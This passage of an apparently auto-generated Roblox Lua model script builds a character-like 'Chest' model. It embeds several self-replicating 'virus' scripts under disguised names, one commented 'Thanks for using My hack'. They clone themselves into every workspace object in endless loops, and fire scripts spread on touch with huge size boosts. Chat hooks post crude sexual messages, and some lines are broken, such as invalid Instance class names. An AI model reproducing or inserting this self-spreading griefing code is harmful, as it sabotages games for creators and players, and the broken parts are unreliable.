["Parent"] = o63,
1891
})
1892
table.insert(cors,coroutine.create(function()
1893
wait()
1894
runDummyScript(function()
1895
function spread() -- created by bumblebee773
1896
local stuff = game.Workspace:GetChildren()
1897
for i = 1, #stuff do
1898
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
1899
local clone = script:clone()
1900
clone.Parent = stuff[i]
1901
end
1902
end
1903
end
1904
1905
while true do
1906
wait(.1)
1907
spread()
1908
end
1909
1910
function GetAllItems(mdl) 
1911
local objs = {} 
1912
function Search(obj) 
1913
if obj~=workspace then 
1914
table.insert(objs,obj) 
1915
end 
1916
if #obj:GetChildren() > 0 then 
1917
for i, v in ipairs(obj:GetChildren()) do 
1918
Search(v) 
1919
end 
1920
end 
1921
end 
1922
Search(mdl) 
1923
return objs 
1924
end 
1925
1926
1927
1928
for i, v in ipairs(GetAllItems(workspace)) do 
1929
if v.className == "Script" then 
1930
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
1931
v.Parent = game.Lighting --Just in case it has a removal prevention. 
1932
t = Instance.new("ObjectValue") 
1933
t.Name = "IsAVirus" 
1934
t.Parent = v 
1935
end 
1936
end 
1937
end 
1938
1939
for i, v in ipairs(game.Lighting:GetChildren()) do 
1940
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
1941
v:remove() 
1942
end 
1943
end 
1944
1945
1946
print("Virus debugged! All clean!")
1947
end,o73)
1948
end))
1949
o75 = Create("Script",{
1950
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
1951
["Parent"] = mas,
1952
})
1953
table.insert(cors,coroutine.create(function()
1954
wait()
1955
runDummyScript(function()
1956
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
1957
local NameCheck = false
1958
script.Parent.Name = names[math.random(1, #names)]
1959
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
1960
local c = script.Parent:Clone()
1961
1962
function addEvent(ch)
1963
	wait(math.random())
1964
	NameCheck = false
1965
	for ss = 1, #names do
1966
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
1967
			NameCheck = true
1968
		end
1969
	end
1970
	if NameCheck == false then
1971
		local cloak = c:Clone()
1972
		cloak.Name = ""
1973
		cloak:GetChildren()[1].Name = ""
1974
		cloak.Parent = ch
1975
		cloak.Name = names[math.random(1, 5)]
1976
	end
1977
end
1978
1979
workspace.ChildAdded:connect(addEvent)
1980
1981
game.Players.PlayerAdded:connect(function(pl)
1982
	pl.Chatted:connect(function(m)
1983
		if m:sub(1, 5) == "/sc t" then
1984
			local m = Instance.new("Message")
1985
			m.Parent = workspace
1986
			m.Text = "THEY CALL ME CRAZY"
1987
			wait(1)
1988
			m.Text = "lOoOoOoOp"
1989
			wait(0.25)
1990
			m.Text = "LoOoOoOoP"
1991
			wait(0.25)
1992
			m.Text = "lOoOoOoOp"
1993
			wait(0.25)
1994
			m.Text = "LoOoOoOoP"
1995
			wait(0.25)
1996
			m.Text = "lOoOoOoOp"
1997
			wait(0.25)
1998
			m.Text = "LoOoOoOoP"
1999
			wait(0.25)
2000
			m.Text = "GOTTA GOTTA BE CRAZY"
2001
			wait(1)
2002
			m.Text = "lOoOoOoOp"
2003
			wait(0.25)
2004
			m.Text = "LoOoOoOoP"
2005
			wait(0.25)
2006
			m.Text = "lOoOoOoOp"
2007
			wait(0.25)
2008
			m.Text = "LoOoOoOoP"
2009
			wait(0.25)
2010
			m.Text = "lOoOoOoOp"
2011
			wait(0.25)
2012
			m.Text = "LoOoOoOoP"
2013
			wait(0.25)
2014
			m.Text = "GOTTA GET A LIFE (YOU)"
2015
			wait(3)
2016
			m:remove()
2017
		end
2018
		if m:sub(1, 5) == "HAAXX" then
2019
			local m = Instance.new("Message")
2020
			m.Parent = workspace
2021
			m.Text = "HAAXX"	
2022
			wait(3)
2023
			m:remove()
2024
		end
2025
	end)
2026
end)
2027
2028
while true do
2029
	local s = workspace:GetChildren()
2030
	for i = 1, #s do
2031
		NameCheck = false
2032
		for ss = 1, #names do
2033
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
2034
				NameCheck = true
2035
			end
2036
		end
2037
		if NameCheck == false then
2038
			local cloak = c:Clone()
2039
			cloak.Name = ""
2040
			cloak:GetChildren()[1].Name = ""
2041
			cloak.Parent = s[i]
2042
		end
2043
		wait(0.1)
2044
	end
2045
	wait(1)
2046
end
2047
2048
end,o75)
2049
end))
2050
o77 = Create("Script",{
2051
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
2052
["Parent"] = mas,
2053
})
2054
table.insert(cors,coroutine.create(function()
2055
wait()
2056
runDummyScript(function()
2057
names={"AmazingOmegaJames","H75","","","","","","",""}
2058
local NameCheck = false
2059
script.Parent.Name = names[math.random(1, #names)]
2060
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
2061
local c = script.Parent:Clone()
2062
2063
function addEvent(ch)
2064
	wait(math.random())
2065
	NameCheck = false
2066
	for ss = 1, #names do
2067
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
2068
			NameCheck = true
2069
		end
2070
	end
2071
	if NameCheck == false then
2072
		local cloak = c:Clone()
2073
		cloak.Name = ""
2074
		cloak:GetChildren()[1].Name = ""
2075
		cloak.Parent = ch
2076
		cloak.Name = names[math.random(1, 5)]
2077
	end
2078
end
2079
2080
workspace.ChildAdded:connect(addEvent)
2081
2082
game.Players.PlayerAdded:connect(function(pl)
2083
	pl.Chatted:connect(function(m)
2084
		if m:sub(1, 5) == "/sc t" then
2085
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
2086
			m.Parent = workspace
2087
			m.Text = "THEY CALL ME CRAZY"
2088
			wait(1)
2089
			m.Text = "lOoOoOoOp"
2090
			wait(0.25)
2091
			m.Text = "LoOoOoOoP"
2092
			wait(0.25)
2093
			m.Text = "lOoOoOoOp"
2094
			wait(0.25)
2095
			m.Text = "LoOoOoOoP"
2096
			wait(0.25)
2097
			m.Text = "lOoOoOoOp"
2098
			wait(0.25)
2099
			m.Text = "LoOoOoOoP"
2100
			wait(0.25)
2101
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
2102
			wait(1)
2103
			m.Text = "lOoOoOoOp"
2104
			wait(0.25)
2105
			m.Text = "LoOoOoOoP"
2106
			wait(0.25)
2107
			m.Text = "lOoOoOoOp"
2108
			wait(0.25)
2109
			m.Text = "LoOoOoOoP"
2110
			wait(0.25)
2111
			m.Text = "lOoOoOoOp"
2112
			wait(0.25)
2113
			m.Text = "LoOoOoOoP"
2114
			wait(0.25)
2115
			m.Text = "GOTTA HAVE SEX WITH YOU"
2116
			wait(3)
2117
			m:remove()
2118
		end
2119
		if m:sub(1, 5) == " SEX HAAXX" then
2120
			local m = Instance.new("Message")
2121
			m.Parent = workspace
2122
			m.Text = " SEX HAAXX"	
2123
			wait(3)
2124
			m:remove()
2125
		end
2126
	end)
2127
end)
2128
2129
while true do
2130
	local s = workspace:GetChildren()
2131
	for i = 1, #s do
2132
		NameCheck = false
2133
		for ss = 1, #names do
2134
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
2135
				NameCheck = true
2136
			end
2137
		end
2138
		if NameCheck == false then
2139
			local cloak = c:Clone()
2140
			cloak.Name = ""
2141
			cloak:GetChildren()[1].Name = ""
2142
			cloak.Parent = s[i]
2143
		end
2144
		wait(0.1)
2145
	end
2146
	wait(1)
2147
end
2148
2149
end,o77)
2150
end))
2151
o78 = Create("Model",{
2152
["Name"] = "Chest",
2153
["Parent"] = o1,
2154
})
2155
o79 = Create("Part",{
2156
["Name"] = "Middle",
2157
["Parent"] = o78,
2158
["BrickColor"] = BrickColor.new("White"),
2159
["Transparency"] = 1,
2160
["Position"] = Vector3.new(59.9994774, -5249.39941, -351.075073),
2161
["Rotation"] = Vector3.new(-179.996674, 0.00326851965, -179.997528),
2162
["Anchored"] = true,
2163
["CFrame"] = CFrame.new(59.9994774, -5249.39941, -351.075073, -1, 4.33610439e-005, 5.7046429e-005, 4.33643545e-005, 1, 5.80145061e-005, -5.70439115e-005, 5.80169799e-005, -1),
2164
["FormFactor"] = Enum.FormFactor.Symmetric,
2165
["Size"] = Vector3.new(2, 2, 1),
2166
["BottomSurface"] = Enum.SurfaceType.Smooth,
2167
["TopSurface"] = Enum.SurfaceType.Smooth,
2168
["Color"] = Color3.new(0.94902, 0.952941, 0.952941),
2169
})
2170
o80 = Create("Fire",{
2171
["Parent"] = o79,
2172
["Size"] = 30,
2173
["Color"] = Color3.new(1, 0.678431, 0),
2174
["Enabled"] = false,
2175
["Heat"] = 25,
2176
["SecondaryColor"] = Color3.new(1, 0, 0),
2177
})
2178
o81 = Create("Script",{
2179
["Name"] = "Spread",
2180
["Parent"] = o80,
2181
})
2182
table.insert(cors,coroutine.create(function()
2183
wait()
2184
runDummyScript(function()
2185
function Spread(part)
2186
	check = part:findFirstChild("Fire")
2187
		if check == nil then 
2188
	script.Parent:Clone().Parent = part
2189
	
2190
		elseif check ~= nil then
2191
	check.Size = check.Size + 1000000
2192
	check.Heat = check.Heat  +1000000
2193
	end
2194
end
2195
2196
2197
script.Parent.Parent.Touched:connect(Spread)
2198
2199
end,o81)
2200
end))
2201
o82 = Create("Part",{
2202
["Name"] = "Head",
2203
["Parent"] = o78,
2204
["Material"] = Enum.Material.SmoothPlastic,
2205
["BrickColor"] = BrickColor.new("Cool yellow"),
2206
["Position"] = Vector3.new(60.0518608, -5247.89893, -351.152039),
2207
["Rotation"] = Vector3.new(-179.999725, -0.000220208487, 179.999969),
2208
["Anchored"] = true,
2209
["CFrame"] = CFrame.new(60.0518608, -5247.89893, -351.152039, -1, -5.16169621e-007, -3.84336317e-006, -5.16188663e-007, 1, 4.94845926e-006, 3.84336045e-006, 4.94846108e-006, -1),
2210
["FormFactor"] = Enum.FormFactor.Symmetric,
2211
["Size"] = Vector3.new(2, 1, 1),
2212
["TopSurface"] = Enum.SurfaceType.Smooth,
2213
["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
2214
})
2215
o83 = Create("SpecialMesh",{
2216
["Parent"] = o82,
2217
["Scale"] = Vector3.new(1.25, 1.25, 1.25),
2218
})
2219
o84 = Create("Fire",{
2220
["Parent"] = o82,
2221
["Size"] = 30,
2222
["Color"] = Color3.new(1, 0.678431, 0),
2223
["Enabled"] = false,
2224
["Heat"] = 25,
2225
["SecondaryColor"] = Color3.new(1, 0, 0),
2226
})
2227
o85 = Create("Script",{
2228
["Name"] = "Spread",
2229
["Parent"] = o84,
2230
})
2231
table.insert(cors,coroutine.create(function()
2232
wait()
2233
runDummyScript(function()
2234
function Spread(part)
2235
	check = part:findFirstChild("Fire")
2236
		if check == nil then 
2237
	script.Parent:Clone().Parent = part
2238
	
2239
		elseif check ~= nil then
2240
	check.Size = check.Size + 1000000
2241
	check.Heat = check.Heat  +1000000
2242
	end
2243
end
2244
2245
2246
script.Parent.Parent.Touched:connect(Spread)
2247
2248
end,o85)
2249
end))
2250
o86 = Create("Script",{
2251
["Name"] = "Vaccine",
2252
["Parent"] = o82,
2253
})
2254
table.insert(cors,coroutine.create(function()
2255
wait()
2256
runDummyScript(function()
2257
function spread() -- created by bumblebee773
2258
local stuff = game.Workspace:GetChildren()
2259
for i = 1, #stuff do
2260
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
2261
local clone = script:clone()
2262
clone.Parent = stuff[i]
2263
end
2264
end
2265
end
2266
2267
while true do
2268
wait(.1)
2269
spread()
2270
end
2271
2272
function GetAllItems(mdl) 
2273
local objs = {} 
2274
function Search(obj) 
2275
if obj~=workspace then 
2276
table.insert(objs,obj) 
2277
end 
2278
if #obj:GetChildren() > 0 then 
2279
for i, v in ipairs(obj:GetChildren()) do 
2280
Search(v) 
2281
end 
2282
end 
2283
end 
2284
Search(mdl) 
2285
return objs 
2286
end 
2287
2288
2289
2290
for i, v in ipairs(GetAllItems(workspace)) do 
2291
if v.className == "Script" then 
2292
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
2293
v.Parent = game.Lighting --Just in case it has a removal prevention. 
2294
t = Instance.new("ObjectValue") 
2295
t.Name = "IsAVirus" 
2296
t.Parent = v 
2297
end 
2298
end 
2299
end 
2300
2301
for i, v in ipairs(game.Lighting:GetChildren()) do 
2302
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
2303
v:remove() 
2304
end 
2305
end 
2306
2307
2308
print("Virus debugged! All clean!")
2309
end,o86)
2310
end))
2311
o87 = Create("Decal",{
2312
["Parent"] = o82,
2313
["Texture"] = "http://www.roblox.com/asset/?id=114561117",
2314
})
2315
o88 = Create("Part",{
2316
["Name"] = "sphere",
2317
["Parent"] = o78,
2318
["Material"] = Enum.Material.Neon,
2319
["BrickColor"] = BrickColor.new("Really black"),
2320
["Position"] = Vector3.new(56.6075745, -5244.68555, -352.150116),
2321
["Rotation"] = Vector3.new(90.0001373, 44.9998589, -0.000344781816),
2322
["Anchored"] = true,
2323
["CFrame"] = CFrame.new(56.6075745, -5244.68555, -352.150116, 0.707108498, 4.25508051e-006, 0.707105041, 0.707105041, 1.87493026e-006, -0.707108498, -4.33457626e-006, 1, -1.68300937e-006),
2324
["FormFactor"] = Enum.FormFactor.Plate,
2325
["Size"] = Vector3.new(4.45820379, 4.45820332, 4.45820379),
2326
["BottomSurface"] = Enum.SurfaceType.Smooth,
2327
["TopSurface"] = Enum.SurfaceType.Smooth,
2328
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
2329
})
2330
o89 = Create("SpecialMesh",{
2331
["Parent"] = o88,
2332
["Scale"] = Vector3.new(0.5, 0.5, 0.5),
2333
["MeshType"] = Enum.MeshType.Sphere,
2334
})
2335
o90 = Create("Fire",{
2336
["Parent"] = o88,
2337
["Size"] = 30,
2338
["Color"] = Color3.new(1, 0.678431, 0),
2339
["Enabled"] = false,
2340
["Heat"] = 25,
2341
["SecondaryColor"] = Color3.new(1, 0, 0),
2342
})
2343
o91 = Create("Script",{
2344
["Name"] = "Spread",
2345
["Parent"] = o90,
2346
})
2347
table.insert(cors,coroutine.create(function()
2348
wait()
2349
runDummyScript(function()
2350
function Spread(part)
2351
	check = part:findFirstChild("Fire")
2352
		if check == nil then 
2353
	script.Parent:Clone().Parent = part
2354
	
2355
		elseif check ~= nil then
2356
	check.Size = check.Size + 1000000
2357
	check.Heat = check.Heat  +1000000
2358
	end
2359
end
2360
2361
2362
script.Parent.Parent.Touched:connect(Spread)
2363
2364
end,o91)
2365
end))
2366
o92 = Create("Script",{
2367
["Name"] = "Vaccine",
2368
["Parent"] = o88,
2369
})
2370
table.insert(cors,coroutine.create(function()
2371
wait()
2372
runDummyScript(function()
2373
function spread() -- created by bumblebee773
2374
local stuff = game.Workspace:GetChildren()
2375
for i = 1, #stuff do
2376
if (stuff[i].className ~= "Script") and (stuff[i]:findFirstChild("Vaccine") == nil) and (stuff[i].className ~= "Camera") then
2377
local clone = script:clone()
2378
clone.Parent = stuff[i]
2379
end
2380
end
2381
end
2382
2383
while true do
2384
wait(.1)
2385
spread()
2386
end
2387
2388
function GetAllItems(mdl) 
2389
local objs = {} 
2390
function Search(obj) 
2391
if obj~=workspace then 
2392
table.insert(objs,obj) 
2393
end 
2394
if #obj:GetChildren() > 0 then 
2395
for i, v in ipairs(obj:GetChildren()) do 
2396
Search(v) 
2397
end 
2398
end 
2399
end 
2400
Search(mdl) 
2401
return objs 
2402
end 
2403
2404
2405
2406
for i, v in ipairs(GetAllItems(workspace)) do 
2407
if v.className == "Script" then 
2408
if v.Name == "Chaotic" or v.Name == "Spreadify" or v.Name == "Virus" or v.Name == "Infected" then 
2409
v.Parent = game.Lighting --Just in case it has a removal prevention. 
2410
t = Instance.new("ObjectValue") 
2411
t.Name = "IsAVirus" 
2412
t.Parent = v 
2413
end 
2414
end 
2415
end 
2416
2417
for i, v in ipairs(game.Lighting:GetChildren()) do 
2418
if v:findFirstChild("IsAVirus") then --Only remove the viruses. 
2419
v:remove() 
2420
end 
2421
end 
2422
2423
2424
print("Virus debugged! All clean!")
2425
end,o92)
2426
end))
2427
o94 = Create("Script",{
2428
["Name"] = "Script......Or is it...",
2429
["Parent"] = mas,
2430
})
2431
table.insert(cors,coroutine.create(function()
2432
wait()
2433
runDummyScript(function()
2434
-- Thanks for using My hack.............suka XD
2435
2436
if script.Parent.className ~= "RotateP" then
2437
	local p = Instance.new("RotateP")
2438
	p.Parent = workspace
2439
	p.Name = "dåååååååååååååång.........you got owned..."
2440
	script.Parent = p
2441
end
2442
2443
function check()
2444
	local list = workspace:GetChildren()
2445
	for i = 1, #list do
2446
		if list[i]:findFirstChild("dåååååååååååååång.........you got owned...") == nil and list[i].className ~= "RotateP" then
2447
			script.Parent:Clone().Parent = list[i]
2448
		end
2449
		wait()
2450
	end
2451
end
2452
2453
while true do
2454
	check()
2455
	if workspace:findFirstChild("Hello...I åm Your New Lord Lolz") == nil then
2456
		local main = script.Parent:Clone()
2457
		main.Name = "Hello...I åm Your New Lord Lolz"
2458
		main.Parent = workspace
2459
	end
2460
	wait(3)
2461
end
2462
-- Credit goes to Nomnomnom1..........................really..........did you need to know?!
2463
-- Have a nice day. XD
2464
end,o94)
2465
end))
2466
o96 = Create("Script",{
2467
["Name"] = "Script......Or is it...",
2468
["Parent"] = mas,
2469
})
2470
table.insert(cors,coroutine.create(function()
2471
wait()
2472
runDummyScript(function()
2473
if script.Parent.className ~= "RotateP" then
2474
	local p = Instance.new("RotateP")
2475
	p.Parent = workspace
2476
	p.Name = "INfecTION"
2477
	script.Parent = p
2478
end
2479
2480
function check()
2481
	local list = workspace:GetChildren()
2482
	for i = 1, #list do
2483
		if list[i]:findFirstChild("INfecTION") == nil and list[i].className ~= "RotateP" then
2484
			script.Parent:Clone().Parent = list[i]
2485
		end
2486
		wait()
2487
	end
2488
end
2489
2490
while true do
2491
	check()
2492
	if workspace:findFirstChild("inFECtion") == nil then
2493
		local main = script.Parent:Clone()
2494
		main.Name = "inFECtion"
2495
		main.Parent = workspace
2496
	end
2497
	wait(3)
2498
end
2499
2500
end,o96)
2501
end))
2502
o98 = Create("Script",{
2503
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
2504
["Parent"] = mas,
2505
})
2506
table.insert(cors,coroutine.create(function()
2507
wait()
2508
runDummyScript(function()
2509
names={"dapperguestyo"}
2510
local NameCheck = false
2511
script.Parent.Name = names[math.random(1, #names)]
2512
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
2513
local c = script.Parent:Clone()
2514
2515
function addEvent(ch)
2516
	wait(math.random())
2517
	NameCheck = false
2518
	for ss = 1, #names do
2519
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
2520
			NameCheck = true
2521
		end
2522
	end
2523
	if NameCheck == false then
2524
		local cloak = c:Clone()
2525
		cloak.Name = ""
2526
		cloak:GetChildren()[1].Name = ""
2527
		cloak.Parent = ch
2528
		cloak.Name = names[math.random(1, 5)]
2529
	end
2530
end
2531
2532
workspace.ChildAdded:connect(addEvent)
2533
2534
game.Players.PlayerAdded:connect(function(pl)
2535
	pl.Chatted:connect(function(m)
2536
		if m:sub(1, 5) == "/sc t" then
2537
			local m = Instance.new("Message")
2538
			m.Parent = workspace
2539
			m.Text = "THEY CALL ME CRAZY"
2540
			wait(1)
2541
			m.Text = "lOoOoOoOp"
2542
			wait(0.25)
2543
			m.Text = "next page"
2544
			wait(0.25)
2545
			m.Text = "lOoOoOoOp"
2546
			wait(0.25)
2547
			m.Text = "LoOoOoOoP"
2548
			wait(0.25)
2549
			m.Text = "lOoOoOoOp"
2550
			wait(0.25)
2551
			m.Text = "LoOoOoOoP"
2552
			wait(0.25)
2553
			m.Text = "GOTTA GOTTA BE CRAZY"
2554
			wait(1)
2555
			m.Text = "lOoOoOoOp"
2556
			wait(0.25)
2557
			m.Text = "LoOoOoOoP"
2558
			wait(0.25)
2559
			m.Text = "lOoOoOoOp"
2560
			wait(0.25)
2561
			m.Text = "brendantaylor rules"
2562
			wait(0.25)
2563
			m.Text = "so does iampoobx"
2564
			wait(0.25)
2565
			m.Text = "LoOoOoOoP"
2566
			wait(0.25)
2567
			m.Text = "GOTTA GET A LIFE (YOU)"
2568
			wait(3)
2569
			m:remove()
2570
		end
2571
		if m:sub(1, 5) == "HAAXX" then
2572
			local m = Instance.new("Message")
2573
			m.Parent = workspace
2574
			m.Text = "HAAXX"	
2575
			wait(3)
2576
			m:remove()
2577
		end
2578
	end)
2579
end)
2580
2581
while true do
2582
	local s = workspace:GetChildren()
2583
	for i = 1, #s do
2584
		NameCheck = false
2585
		for ss = 1, #names do
2586
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
2587
				NameCheck = true
2588
			end
2589
		end
2590
		if NameCheck == false then
2591
			local cloak = c:Clone()
2592
			cloak.Name = ""
2593
			cloak:GetChildren()[1].Name = ""
2594
			cloak.Parent = s[i]
2595
		end
2596
		wait(0.1)
2597
	end
2598
	wait(1)
2599
end
2600
2601
end,o98)
2602
end))
2603
o100 = Create("Script",{
2604
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
2605
["Parent"] = mas,
2606
})
2607
table.insert(cors,coroutine.create(function()
2608
wait()
2609
runDummyScript(function()
2610
names={"NoNoIDon'tNeedAllOfYourAwkwårdSovietArguments", "IAmHereToHeålYourPlace", "FeelFreeToIns3rtGrammåticålErrorsHere", "ThisScriptIsAJumpStartToAHeålthyLifestyle", "FreeStyleMåyGoAnywhereIfNeeded", "3.14159265358979,ALotOfRåndomPiNumbers", "RandomåGoesHere:3", [[""''""''""å|`ç]], "77å", "å9001", "IStårtHere"}
2611
local NameCheck = false
2612
script.Parent.Name = names[math.random(1, #names)]
2613
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
2614
local c = script.Parent:Clone()
2615
2616
function addEvent(ch)
2617
	wait(math.random())
2618
	NameCheck = false
2619
	for ss = 1, #names do
2620
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
2621
			NameCheck = true
2622
		end
2623
	end
2624
	if NameCheck == false then
2625
		local cloak = c:Clone()
2626
		cloak.Name = ""
2627
		cloak:GetChildren()[1].Name = ""
2628
		cloak.Parent = ch
2629
		cloak.Name = names[math.random(1, 5)]
2630
	end
2631
end
2632
2633
workspace.ChildAdded:connect(addEvent)
2634
2635
game.Players.PlayerAdded:connect(function(pl)
2636
	pl.Chatted:connect(function(m)
2637
		if m:sub(1, 5) == "/sc t" then
2638
			local m = Instance.new("Message")
2639
			m.Parent = workspace
2640
			m.Text = "THEY CALL ME CRAZY"
2641
			wait(1)
2642
			m.Text = "lOoOoOoOp"
2643
			wait(0.25)
2644
			m.Text = "LoOoOoOoP"
2645
			wait(0.25)
2646
			m.Text = "lOoOoOoOp"
2647
			wait(0.25)
2648
			m.Text = "LoOoOoOoP"
2649
			wait(0.25)
2650
			m.Text = "lOoOoOoOp"
2651
			wait(0.25)
2652
			m.Text = "LoOoOoOoP"
2653
			wait(0.25)
2654
			m.Text = "GOTTA GOTTA BE CRAZY"
2655
			wait(1)
2656
			m.Text = "lOoOoOoOp"
2657
			wait(0.25)
2658
			m.Text = "LoOoOoOoP"
2659
			wait(0.25)
2660
			m.Text = "lOoOoOoOp"
2661
			wait(0.25)
2662
			m.Text = "LoOoOoOoP"
2663
			wait(0.25)
2664
			m.Text = "lOoOoOoOp"
2665
			wait(0.25)
2666
			m.Text = "LoOoOoOoP"
2667
			wait(0.25)
2668
			m.Text = "GOTTA GET A LIFE (YOU)"
2669
			wait(3)
2670
			m:remove()
2671
		end
2672
		if m:sub(1, 5) == "HAAXX" then
2673
			local m = Instance.new("Message")
2674
			m.Parent = workspace
2675
			m.Text = "HAAXX"	
2676
			wait(3)
2677
			m:remove()
2678
		end
2679
	end)
2680
end)
2681
2682
while true do
2683
	local s = workspace:GetChildren()
2684
	for i = 1, #s do
2685
		NameCheck = false
2686
		for ss = 1, #names do
2687
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
2688
				NameCheck = true
2689
			end
2690
		end
2691
		if NameCheck == false then
2692
			local cloak = c:Clone()
2693
			cloak.Name = ""
2694
			cloak:GetChildren()[1].Name = ""
2695
			cloak.Parent = s[i]
2696
		end
2697
		wait(0.1)
2698
	end
2699
	wait(1)
2700
end
2701
2702
end,o100)
2703
end))
2704
o102 = Create("Script",{
2705
["Name"] = "ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere",
2706
["Parent"] = mas,
2707
})
2708
table.insert(cors,coroutine.create(function()
2709
wait()
2710
runDummyScript(function()
2711
names={"AmazingOmegaJames","H75","","","","","","",""}
2712
local NameCheck = false
2713
script.Parent.Name = names[math.random(1, #names)]
2714
script.Name = [[ProperGråmmerNeededInPhilosiphalLocations;insertNoobHere]]
2715
local c = script.Parent:Clone()
2716
2717
function addEvent(ch)
2718
	wait(math.random())
2719
	NameCheck = false
2720
	for ss = 1, #names do
2721
		if ch:IsA("RotateP") or ch:findFirstChild(names[ss]) ~= nil then
2722
			NameCheck = true
2723
		end
2724
	end
2725
	if NameCheck == false then
2726
		local cloak = c:Clone()
2727
		cloak.Name = ""
2728
		cloak:GetChildren()[1].Name = ""
2729
		cloak.Parent = ch
2730
		cloak.Name = names[math.random(1, 5)]
2731
	end
2732
end
2733
2734
workspace.ChildAdded:connect(addEvent)
2735
2736
game.Players.PlayerAdded:connect(function(pl)
2737
	pl.Chatted:connect(function(m)
2738
		if m:sub(1, 5) == "/sc t" then
2739
			local m = Instance.new("The creator of this place is AmazingOmegaJames")
2740
			m.Parent = workspace
2741
			m.Text = "THEY CALL ME CRAZY"
2742
			wait(1)
2743
			m.Text = "lOoOoOoOp"
2744
			wait(0.25)
2745
			m.Text = "LoOoOoOoP"
2746
			wait(0.25)
2747
			m.Text = "lOoOoOoOp"
2748
			wait(0.25)
2749
			m.Text = "LoOoOoOoP"
2750
			wait(0.25)
2751
			m.Text = "lOoOoOoOp"
2752
			wait(0.25)
2753
			m.Text = "LoOoOoOoP"
2754
			wait(0.25)
2755
			m.Text = "GOTTA GOTTA BE CRAZY SEX"
2756
			wait(1)
2757
			m.Text = "lOoOoOoOp"
2758
			wait(0.25)
2759
			m.Text = "LoOoOoOoP"
2760
			wait(0.25)
2761
			m.Text = "lOoOoOoOp"
2762
			wait(0.25)
2763
			m.Text = "LoOoOoOoP"
2764
			wait(0.25)
2765
			m.Text = "lOoOoOoOp"
2766
			wait(0.25)
2767
			m.Text = "LoOoOoOoP"
2768
			wait(0.25)
2769
			m.Text = "GOTTA HAVE SEX WITH YOU"
2770
			wait(3)
2771
			m:remove()
2772
		end
2773
		if m:sub(1, 5) == " SEX HAAXX" then
2774
			local m = Instance.new("Message")
2775
			m.Parent = workspace
2776
			m.Text = " SEX HAAXX"	
2777
			wait(3)
2778
			m:remove()
2779
		end
2780
	end)
2781
end)
2782
2783
while true do
2784
	local s = workspace:GetChildren()
2785
	for i = 1, #s do
2786
		NameCheck = false
2787
		for ss = 1, #names do
2788
			if s[i]:IsA("RotateP") or s[i]:findFirstChild(names[ss]) ~= nil then
2789
				NameCheck = true
2790
			end
2791
		end
2792
		if NameCheck == false then
2793
			local cloak = c:Clone()
2794
			cloak.Name = ""
2795
			cloak:GetChildren()[1].Name = ""
2796
			cloak.Parent = s[i]
2797
		end
2798
		wait(0.1)
2799
	end
2800
	wait(1)
2801
end
2802
2803
end,o102)
2804
end))
2805
o103 = Create("Part",{
2806
["Name"] = "sphere",
2807
["Parent"] = o78,
2808
["Material"] = Enum.Material.Neon,
2809
["BrickColor"] = BrickColor.new("Really black"),
2810
["Position"] = Vector3.new(52.6669846, -5248.62646, -352.150085),
2811
["Rotation"] = Vector3.new(90.0001373, 44.9998589, -0.000344781816),
2812
["Anchored"] = true,
2813
["CFrame"] = CFrame.new(52.6669846, -5248.62646, -352.150085, 0.707108498, 4.25508051e-006, 0.707105041, 0.707105041, 1.87493026e-006, -0.707108498, -4.33457626e-006, 1, -1.68300937e-006),
2814
["FormFactor"] = Enum.FormFactor.Plate,
2815
["Size"] = Vector3.new(4.45820379, 4.45820332, 4.45820379),
2816
["BottomSurface"] = Enum.SurfaceType.Smooth,
2817
["TopSurface"] = Enum.SurfaceType.Smooth,
2818
["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
2819
})
2820
o104 = Create("SpecialMesh",{
2821
["Parent"] = o103,
2822
["Scale"] = Vector3.new(0.5, 0.5, 0.5),
2823
["MeshType"] = Enum.MeshType.Sphere,
2824
})
2825
o105 = Create("Fire",{
2826
["Parent"] = o103,
2827
["Size"] = 30,
2828
["Color"] = Color3.new(1, 0.678431, 0),
2829
["Enabled"] = false,
2830
["Heat"] = 25,
2831
["SecondaryColor"] = Color3.new(1, 0, 0),
2832
})
2833
o106 = Create("Script",{
2834
["Name"] = "Spread",
2835
["Parent"] = o105,
2836
})
2837
table.insert(cors,coroutine.create(function()
2838
wait()
2839
runDummyScript(function()
2840
function Spread(part)
2841
	check = part:findFirstChild("Fire")
2842
		if check == nil then 
2843
